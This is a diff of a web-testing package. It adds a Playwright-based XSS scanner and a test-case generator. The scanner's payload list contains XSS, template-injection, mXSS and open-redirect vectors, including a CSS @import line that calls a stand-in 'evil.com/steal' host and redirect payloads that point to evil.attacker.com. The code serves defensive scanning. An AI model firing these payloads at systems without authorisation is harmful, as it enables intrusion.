jaku.sh 1.0.0

package/src/core/security/xss-scanner.js

@@ -0,0 +1,225 @@
+import { chromium } from 'playwright';
+import { createFinding } from '../../utils/finding.js';
+
+/**
+ * XSS Scanner — Probes all discovered input surfaces for Cross-Site Scripting.
+ * Tests reflected, stored, and DOM-based XSS with a comprehensive payload library.
+ * SAFETY: No destructive payloads — all tests use detection-only markers.
+ */
+export class XSSScanner {
+    constructor(logger) {
+        this.logger = logger;
+        this.findings = [];
+    }
+
+    // XSS test payloads — designed for detection, not exploitation
+    static PAYLOADS = [
+        // ── Classic Vectors ──
+        { name: 'Basic script tag', payload: '<script>window.__JAKU_XSS_1=1</script>', marker: '__JAKU_XSS_1' },
+        { name: 'IMG onerror', payload: '<img src=x onerror="window.__JAKU_XSS_2=1">', marker: '__JAKU_XSS_2' },
+        { name: 'SVG onload', payload: '<svg onload="window.__JAKU_XSS_3=1">', marker: '__JAKU_XSS_3' },
+        { name: 'Event handler', payload: '" onfocus="window.__JAKU_XSS_4=1" autofocus="', marker: '__JAKU_XSS_4' },
+        { name: 'Template literal', payload: '${alert(1)}', marker: '${alert' },
+        { name: 'HTML entity bypass', payload: '&lt;script&gt;alert(1)&lt;/script&gt;', marker: '<script>alert' },
+        { name: 'Single quote break', payload: "' onmouseover='window.__JAKU_XSS_5=1", marker: '__JAKU_XSS_5' },
+        { name: 'Double quote break', payload: '" onmouseover="window.__JAKU_XSS_6=1', marker: '__JAKU_XSS_6' },
+        { name: 'JavaScript URL', payload: 'javascript:window.__JAKU_XSS_7=1', marker: '__JAKU_XSS_7' },
+
+        // ── Framework Template Injection ──
+        { name: 'AngularJS template injection', payload: '{{7*7}}', marker: '49' },
+        { name: 'AngularJS constructor XSS', payload: '{{constructor.constructor("window.__JAKU_NG=1")()}}', marker: '__JAKU_NG' },
+        { name: 'Vue.js template injection', payload: '{{$emit("jaku")}}', marker: '$emit' },
+        { name: 'Vue constructor XSS', payload: '{{constructor.constructor(\'window.__JAKU_VUE=1\')()}}', marker: '__JAKU_VUE' },
+
+        // ── Mutation XSS (mXSS) ──
+        { name: 'mXSS — noscript tag', payload: '<noscript><p title="</noscript><img src=x onerror=window.__JAKU_MXSS=1>">', marker: '__JAKU_MXSS' },
+        { name: 'mXSS — table context', payload: '<table><td><title><</title><img src=x onerror=window.__JAKU_MXSS2=1>', marker: '__JAKU_MXSS2' },
+
+        // ── DOM Clobbering ──
+        { name: 'DOM clobber — id=location', payload: '<form id=location></form>', marker: 'id=location' },
+        { name: 'DOM clobber — window.name', payload: `<iframe name="__JAKU_DOM_CLOB"></iframe>`, marker: '__JAKU_DOM_CLOB' },
+
+        // ── CSS Injection ──
+        { name: 'CSS expression injection', payload: `<div style="background:url('javascript:window.__JAKU_CSS=1')">`, marker: '__JAKU_CSS' },
+        { name: 'CSS @import exfil', payload: `<style>@import 'https://evil.com/steal?x=1';</style>`, marker: 'evil.com' },
+
+        // ── Alternative Execution Contexts ──
+        { name: 'SVG foreignObject', payload: '<svg><foreignObject><body xmlns="http://www.w3.org/1999/xhtml"><script>window.__JAKU_SVG_FO=1</script></body></foreignObject></svg>', marker: '__JAKU_SVG_FO' },
+        { name: 'Data URI in iframe', payload: '<iframe src="data:text/html,<script>window.parent.__JAKU_DATA=1</script>"></iframe>', marker: '__JAKU_DATA' },
+        { name: 'iframe srcdoc XSS', payload: '<iframe srcdoc="<script>window.parent.__JAKU_SRCDOC=1</script>"></iframe>', marker: '__JAKU_SRCDOC' },
+
+        // ── Open Redirect (separate from XSS but tested via same param surface) ──
+        { name: 'Open redirect — absolute', payload: 'https://evil.attacker.com', marker: 'evil.attacker.com', type: 'redirect' },
+        { name: 'Open redirect — protocol', payload: '//evil.attacker.com', marker: 'evil.attacker.com', type: 'redirect' },
+        { name: 'Open redirect — backslash', payload: '/\\evil.attacker.com', marker: 'evil.attacker.com', type: 'redirect' },
+    ];
+
+
+    /**
+     * Run XSS scanning on all discovered surfaces.
+     */
+    async scan(surfaceInventory) {
+        const browser = await chromium.launch({ headless: true });
+        const context = await browser.newContext({
+            viewport: { width: 1440, height: 900 },
+            ignoreHTTPSErrors: true,
+        });
+
+        // Test URL parameter reflection
+        await this._testURLParamReflection(context, surfaceInventory);
+
+        // Test form input reflection
+        await this._testFormInputReflection(context, surfaceInventory);
+
+        await browser.close();
+        this.logger?.info?.(`XSS scanner found ${this.findings.length} issues`);
+        return this.findings;
+    }
+
+    /**
+     * Test if URL parameters are reflected without encoding.
+     */
+    async _testURLParamReflection(context, inventory) {
+        for (const pageData of inventory.pages) {
+            if (typeof pageData.status !== 'number' || pageData.status >= 400) continue;
+
+            const page = await context.newPage();
+            try {
+                // Test with a canary value in common parameter names
+                const testParams = ['q', 'search', 'query', 'keyword', 's', 'term', 'name', 'id', 'page', 'redirect', 'url', 'return', 'next', 'callback'];
+
+                for (const param of testParams) {
+                    // Use a subset of payloads for URL params
+                    for (const { name, payload, marker } of XSSScanner.PAYLOADS.slice(0, 3)) {
+                        const testUrl = new URL(pageData.url);
+                        testUrl.searchParams.set(param, payload);
+
+                        try {
+                            await page.goto(testUrl.toString(), {
+                                waitUntil: 'domcontentloaded',
+                                timeout: 10000,
+                            });
+
+                            // Check if the payload is reflected in the page source
+                            const content = await page.content();
+                            const isReflected = content.includes(payload);
+
+                            // Check if the XSS actually executed
+                            const executed = await page.evaluate((m) => {
+                                return window[m] === 1;
+                            }, marker).catch(() => false);
+
+                            if (executed) {
+                                this.findings.push(createFinding({
+                                    module: 'security',
+                                    title: `Reflected XSS via URL Parameter: ${param}`,
+                                    severity: 'high',
+                                    affected_surface: pageData.url,
+                                    description: `The URL parameter "${param}" is vulnerable to reflected Cross-Site Scripting (XSS). The payload "${name}" was injected and executed in the browser context.\n\nThis allows attackers to execute arbitrary JavaScript in victims\' browsers via crafted URLs, enabling session hijacking, credential theft, and defacement.`,
+                                    reproduction: [
+                                        `1. Navigate to: ${testUrl.toString()}`,
+                                        `2. The ${name} payload executes in the browser`,
+                                        `3. Verify with DevTools: window.${marker} === 1`,
+                                    ],
+                                    evidence: JSON.stringify({ param, payload, name, executed: true }),
+                                    remediation: 'HTML-encode all user input before rendering in the page. Use framework-provided escaping functions. Implement a Content-Security-Policy header to mitigate impact.',
+                                    references: ['https://owasp.org/www-community/attacks/xss/', 'CWE-79'],
+                                }));
+                                break; // One finding per param is sufficient
+                            } else if (isReflected) {
+                                this.findings.push(createFinding({
+                                    module: 'security',
+                                    title: `Potential Reflected XSS: ${param} (Payload Reflected)`,
+                                    severity: 'medium',
+                                    affected_surface: pageData.url,
+                                    description: `The URL parameter "${param}" reflects the XSS payload "${name}" in the response without proper encoding. While the payload did not execute in this test (browser may have blocked it), the lack of encoding indicates a vulnerability that could be exploited with alternative payloads.`,
+                                    reproduction: [
+                                        `1. Navigate to: ${testUrl.toString()}`,
+                                        `2. View page source — payload appears unencoded`,
+                                    ],
+                                    evidence: JSON.stringify({ param, payload, name, reflected: true, executed: false }),
+                                    remediation: 'All user input must be HTML-encoded before rendering. Even if the current payload is blocked, other payloads or browser contexts may succeed.',
+                                    references: ['https://owasp.org/www-community/attacks/xss/', 'CWE-79'],
+                                }));
+                                break;
+                            }
+                        } catch {
+                            // Navigation failed — skip
+                        }
+                    }
+                }
+            } catch (err) {
+                this.logger?.debug?.(`XSS URL param test failed for ${pageData.url}: ${err.message}`);
+            } finally {
+                await page.close();
+            }
+        }
+    }
+
+    /**
+     * Test form inputs for XSS via submission.
+     */
+    async _testFormInputReflection(context, inventory) {
+        for (const form of inventory.forms) {
+            const page = await context.newPage();
+            try {
+                await page.goto(form.page, { waitUntil: 'networkidle', timeout: 15000 });
+
+                // Use a small subset of payloads for each form
+                const testPayload = XSSScanner.PAYLOADS[0]; // Basic script tag
+
+                for (const field of form.fields) {
+                    if (['hidden', 'submit', 'button', 'checkbox', 'radio', 'file'].includes(field.type)) continue;
+
+                    try {
+                        const input = await page.$(`[name="${field.name}"]`) || await page.$(`#${field.name}`);
+                        if (!input) continue;
+
+                        await input.fill(testPayload.payload);
+
+                        // Submit the form
+                        const submitBtn = await page.$(`#${form.id} button[type="submit"]`)
+                            || await page.$('button[type="submit"], input[type="submit"]');
+
+                        if (submitBtn) {
+                            await submitBtn.click();
+                            await page.waitForTimeout(2000);
+
+                            // Check if payload reflected in the response
+                            const content = await page.content();
+                            if (content.includes(testPayload.payload)) {
+                                this.findings.push(createFinding({
+                                    module: 'security',
+                                    title: `Form XSS: Input "${field.name}" in ${form.id}`,
+                                    severity: 'high',
+                                    affected_surface: form.page,
+                                    description: `The form field "${field.name}" in form "${form.id}" does not sanitize XSS payloads. The submitted ${testPayload.name} payload was reflected in the response without encoding.\n\nThis could lead to stored XSS if the data is persisted and displayed to other users.`,
+                                    reproduction: [
+                                        `1. Navigate to ${form.page}`,
+                                        `2. Enter "${testPayload.payload}" in the "${field.name}" field`,
+                                        `3. Submit the form`,
+                                        `4. Payload appears unencoded in the response`,
+                                    ],
+                                    evidence: JSON.stringify({ form: form.id, field: field.name, payload: testPayload.name }),
+                                    remediation: 'Sanitize and HTML-encode all form inputs on both client and server side before rendering. Use parameterized queries for database storage.',
+                                    references: ['https://owasp.org/www-community/attacks/xss/', 'CWE-79'],
+                                }));
+                            }
+
+                            // Navigate back for next field test
+                            await page.goto(form.page, { waitUntil: 'networkidle', timeout: 10000 });
+                        }
+                    } catch {
+                        // Field test failed — continue
+                    }
+                }
+            } catch (err) {
+                this.logger?.debug?.(`XSS form test failed for ${form.page}: ${err.message}`);
+            } finally {
+                await page.close();
+            }
+        }
+    }
+}
+
+export default XSSScanner;

package/src/core/test-generator.js

@@ -0,0 +1,339 @@
+/**
+ * Test Generator — Generates test cases from the Surface Inventory.
+ * Produces smoke, navigation, form, API, and edge-case tests.
+ */
+export class TestGenerator {
+    constructor(logger) {
+        this.logger = logger;
+    }
+
+    /**
+     * Generate all test cases from a Surface Inventory.
+     * @returns {TestCase[]} Array of test case objects
+     */
+    generate(surfaceInventory) {
+        const tests = [
+            ...this._generateSmokeTests(surfaceInventory),
+            ...this._generateNavigationTests(surfaceInventory),
+            ...this._generateFormTests(surfaceInventory),
+            ...this._generateApiTests(surfaceInventory),
+            ...this._generateEdgeCaseTests(surfaceInventory),
+        ];
+
+        this.logger?.info?.(`Generated ${tests.length} test cases`);
+        return tests;
+    }
+
+    /**
+     * Smoke tests: one test per unique URL *pattern* (UUIDs and numeric IDs normalized).
+     * This prevents 49 identical findings for /trips/<uuid> pages.
+     */
+    _generateSmokeTests(inventory) {
+        const seenPatterns = new Map(); // pattern → first representative URL
+
+        for (const page of inventory.pages) {
+            const pattern = this._normalizePathPattern(page.url);
+            if (!seenPatterns.has(pattern)) {
+                seenPatterns.set(pattern, page.url);
+            }
+        }
+
+        const tests = [];
+        let idx = 0;
+        for (const [pattern, representativeUrl] of seenPatterns) {
+            // Count how many URLs match this pattern
+            const matchCount = inventory.pages.filter(
+                p => this._normalizePathPattern(p.url) === pattern
+            ).length;
+
+            tests.push({
+                id: `SMOKE-${String(++idx).padStart(3, '0')}`,
+                type: 'smoke',
+                surface: representativeUrl,
+                urlPattern: pattern,
+                matchCount,              // how many URLs share this pattern
+                title: matchCount > 1
+                    ? `Page loads successfully: ${pattern} (${matchCount} pages)`
+                    : `Page loads successfully: ${this._shortUrl(representativeUrl)}`,
+                steps: [
+                    { action: 'navigate', url: representativeUrl },
+                    { action: 'assert_status', expected: 200 },
+                    { action: 'assert_no_console_errors' },
+                    { action: 'assert_has_content' },
+                ],
+                expected: {
+                    status: 200,
+                    noConsoleErrors: true,
+                    hasContent: true,
+                },
+            });
+        }
+
+        this.logger?.info?.(`Smoke tests: ${inventory.pages.length} pages → ${tests.length} pattern-deduplicated tests`);
+        return tests;
+    }
+
+    /**
+     * Normalize a URL path to a pattern by replacing:
+     *  - UUIDs  (8-4-4-4-12 hex)   → :uuid
+     *  - Long numeric IDs (> 4 digits) → :id
+     *  - Short numeric segments      → :n
+     * Also strips query strings and hashes.
+     *
+     * Examples:
+     *  /trips/5f8579e0-0054-4cb9-b80e-b00b19369536?edit=true → /trips/:uuid
+     *  /profile/42                                          → /profile/:n
+     *  /packages/rajasthan-royal-heritage-tour              → /packages/rajasthan-royal-heritage-tour (unchanged)
+     */
+    _normalizePathPattern(url) {
+        try {
+            const u = new URL(url);
+            const pathname = u.pathname
+                // UUID pattern (8-4-4-4-12)
+                .replace(/[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/gi, ':uuid')
+                // Long numeric IDs (5+ digits are definitely database IDs)
+                .replace(/\/[0-9]{5,}/g, '/:id')
+                // Short numeric path segments (e.g. /profile/3)
+                .replace(/\/[0-9]{1,4}(?=\/|$)/g, '/:n')
+                // Trailing slash normalization
+                .replace(/\/+$/, '') || '/';
+            return pathname;
+        } catch {
+            return url;
+        }
+    }
+
+    /**
+     * Navigation tests: all internal links are reachable.
+     * Deduplicated by normalized URL pattern to avoid testing 49 /trips/<uuid> links.
+     */
+    _generateNavigationTests(inventory) {
+        const tests = [];
+        const testedPatterns = new Set();
+
+        for (const page of inventory.pages) {
+            for (const link of (page.links || [])) {
+                const pattern = this._normalizePathPattern(link);
+                if (testedPatterns.has(pattern)) continue;
+                testedPatterns.add(pattern);
+
+                tests.push({
+                    id: `NAV-${String(tests.length + 1).padStart(3, '0')}`,
+                    type: 'navigation',
+                    surface: link,
+                    sourcePage: page.url,
+                    title: `Link reachable: ${this._shortUrl(link)}`,
+                    steps: [
+                        { action: 'navigate', url: page.url },
+                        { action: 'click_link', url: link },
+                        { action: 'assert_status', expected: [200, 301, 302] },
+                    ],
+                    expected: {
+                        reachable: true,
+                        noErrors: true,
+                    },
+                });
+            }
+        }
+
+        return tests;
+    }
+
+    /**
+     * Form tests: every form can be submitted with valid and invalid data.
+     */
+    _generateFormTests(inventory) {
+        const tests = [];
+
+        for (const form of inventory.forms) {
+            // Test 1: Submit empty (required field validation)
+            tests.push({
+                id: `FORM-${String(tests.length + 1).padStart(3, '0')}`,
+                type: 'form',
+                subtype: 'empty_submit',
+                surface: form.page,
+                formId: form.id,
+                title: `Empty form submission blocked: ${form.id}`,
+                steps: [
+                    { action: 'navigate', url: form.page },
+                    { action: 'locate_form', selector: form.id },
+                    { action: 'submit_empty' },
+                    { action: 'assert_validation_error' },
+                ],
+                expected: {
+                    blocked: true,
+                    showsValidationError: true,
+                },
+            });
+
+            // Test 2: Submit with valid data
+            const validData = this._generateValidData(form.fields);
+            tests.push({
+                id: `FORM-${String(tests.length + 1).padStart(3, '0')}`,
+                type: 'form',
+                subtype: 'valid_submit',
+                surface: form.page,
+                formId: form.id,
+                title: `Valid form submission succeeds: ${form.id}`,
+                steps: [
+                    { action: 'navigate', url: form.page },
+                    { action: 'locate_form', selector: form.id },
+                    { action: 'fill_form', data: validData },
+                    { action: 'submit' },
+                    { action: 'assert_submission_feedback' },
+                ],
+                expected: {
+                    submitted: true,
+                    showsFeedback: true,
+                },
+            });
+
+            // Test 3: Type constraint testing for each field
+            for (const field of form.fields) {
+                if (field.type === 'hidden' || field.type === 'submit') continue;
+                const invalidData = this._generateInvalidData(field);
+                if (invalidData) {
+                    tests.push({
+                        id: `FORM-${String(tests.length + 1).padStart(3, '0')}`,
+                        type: 'form',
+                        subtype: 'invalid_input',
+                        surface: form.page,
+                        formId: form.id,
+                        fieldName: field.name,
+                        title: `Invalid input rejected: ${field.name} in ${form.id}`,
+                        steps: [
+                            { action: 'navigate', url: form.page },
+                            { action: 'locate_form', selector: form.id },
+                            { action: 'fill_field', field: field.name, value: invalidData.value },
+                            { action: 'submit' },
+                            { action: 'assert_validation_error', field: field.name },
+                        ],
+                        expected: {
+                            rejected: true,
+                            showsFieldError: true,
+                        },
+                        invalidData,
+                    });
+                }
+            }
+        }
+
+        return tests;
+    }
+
+    /**
+     * API tests: endpoints respond within timeout with valid responses.
+     */
+    _generateApiTests(inventory) {
+        return inventory.apiEndpoints.map((endpoint, idx) => ({
+            id: `API-${String(idx + 1).padStart(3, '0')}`,
+            type: 'api',
+            surface: endpoint.url,
+            method: endpoint.method,
+            title: `API responds: ${endpoint.method} ${this._shortUrl(endpoint.url)}`,
+            steps: [
+                { action: 'http_request', method: endpoint.method, url: endpoint.url },
+                { action: 'assert_status', expected: [200, 201, 204, 301, 302] },
+                { action: 'assert_response_time', maxMs: 5000 },
+                { action: 'assert_valid_json' },
+            ],
+            expected: {
+                validStatus: true,
+                withinTimeout: true,
+                validJson: true,
+            },
+        }));
+    }
+
+    /**
+     * Edge-case tests: boundary values and special characters.
+     */
+    _generateEdgeCaseTests(inventory) {
+        const tests = [];
+
+        for (const form of inventory.forms) {
+            for (const field of form.fields) {
+                if (field.type === 'hidden' || field.type === 'submit') continue;
+
+                // Extremely long input
+                tests.push({
+                    id: `EDGE-${String(tests.length + 1).padStart(3, '0')}`,
+                    type: 'edge-case',
+                    subtype: 'long_input',
+                    surface: form.page,
+                    formId: form.id,
+                    fieldName: field.name,
+                    title: `Long input handled: ${field.name}`,
+                    steps: [
+                        { action: 'navigate', url: form.page },
+                        { action: 'fill_field', field: field.name, value: 'A'.repeat(10000) },
+                        { action: 'submit' },
+                        { action: 'assert_no_crash' },
+                    ],
+                    expected: { noCrash: true },
+                });
+
+                // Special characters
+                tests.push({
+                    id: `EDGE-${String(tests.length + 1).padStart(3, '0')}`,
+                    type: 'edge-case',
+                    subtype: 'special_chars',
+                    surface: form.page,
+                    formId: form.id,
+                    fieldName: field.name,
+                    title: `Special chars handled: ${field.name}`,
+                    steps: [
+                        { action: 'navigate', url: form.page },
+                        { action: 'fill_field', field: field.name, value: '<script>alert(1)</script>\'";--' },
+                        { action: 'submit' },
+                        { action: 'assert_no_crash' },
+                        { action: 'assert_input_sanitized' },
+                    ],
+                    expected: { noCrash: true, sanitized: true },
+                });
+            }
+        }
+
+        return tests;
+    }
+
+    _generateValidData(fields) {
+        const data = {};
+        for (const field of fields) {
+            switch (field.type) {
+                case 'email': data[field.name] = 'test@example.com'; break;
+                case 'password': data[field.name] = 'TestPass123!'; break;
+                case 'tel': data[field.name] = '+1234567890'; break;
+                case 'number': data[field.name] = '42'; break;
+                case 'url': data[field.name] = 'https://example.com'; break;
+                case 'date': data[field.name] = '2025-01-15'; break;
+                case 'checkbox': data[field.name] = true; break;
+                case 'select': data[field.name] = '__first_option__'; break;
+                default: data[field.name] = 'Test input value'; break;
+            }
+        }
+        return data;
+    }
+
+    _generateInvalidData(field) {
+        switch (field.type) {
+            case 'email': return { value: 'not-an-email', reason: 'Invalid email format' };
+            case 'number': return { value: 'not-a-number', reason: 'Non-numeric value in number field' };
+            case 'url': return { value: 'not-a-url', reason: 'Invalid URL format' };
+            case 'tel': return { value: 'abc', reason: 'Non-phone value in tel field' };
+            case 'date': return { value: '99-99-9999', reason: 'Invalid date format' };
+            default: return null;
+        }
+    }
+
+    _shortUrl(url) {
+        try {
+            const u = new URL(url);
+            return u.pathname === '/' ? u.hostname : u.pathname;
+        } catch {
+            return url;
+        }
+    }
+}
+
+export default TestGenerator;